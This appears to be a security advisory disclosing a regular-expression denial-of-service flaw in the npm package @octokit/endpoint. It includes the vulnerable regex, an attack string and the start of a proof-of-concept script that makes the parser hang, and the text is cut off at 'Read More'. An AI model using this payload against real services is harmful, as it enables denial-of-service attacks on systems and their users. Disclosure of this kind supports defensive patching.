Summary By crafting specific options parameters, the endpoint.parse(options) call can be triggered, leading to a regular expression denial-of-service (ReDoS) attack. This causes the program to hang and results in high CPU utilization. Details The issue occurs in the parse function within the parse.ts file of the npm package @octokit/endpoint. The specific code is located at the following link: https://github.com/octokit/endpoint.js/blob/main/src/parse.ts, at line 62: ts headers.accept.match(/[w-]+(?=-preview)/g) || ([] as string[]); The regular expression /[w-]+(?=-preview)/g encounters a backtracking issue when it processes a large number of characters followed by the – symbol. e.g., the attack string: js "" + "A".repeat(100000) + "-" PoC The gist Here is the reproduction process for the vulnerability: 1. run 'npm i @octokit/endpoint' 2. Move poc.js to the root directory of the same level as README.md 3. run 'node poc.js' result: 4. then the program will stuck forever with high CPU usage “`js import { endpoint } from "@octokit/endpoint"; // import { parse } from "./node_modules/@octokit/endpoint/dist-src/parse.js"; const options = { method: "POST", url: "/graphql", // Ensure that the URL ends with "/graphql" headers: { accept: "" + "A".repeat(100000) + "-", // Pass in the attack string "content-type": "text/plain", }, mediaType: { previews: ["test-preview"], // Ensure that mediaType.previews exists and has values format: "raw", // Optional…Read More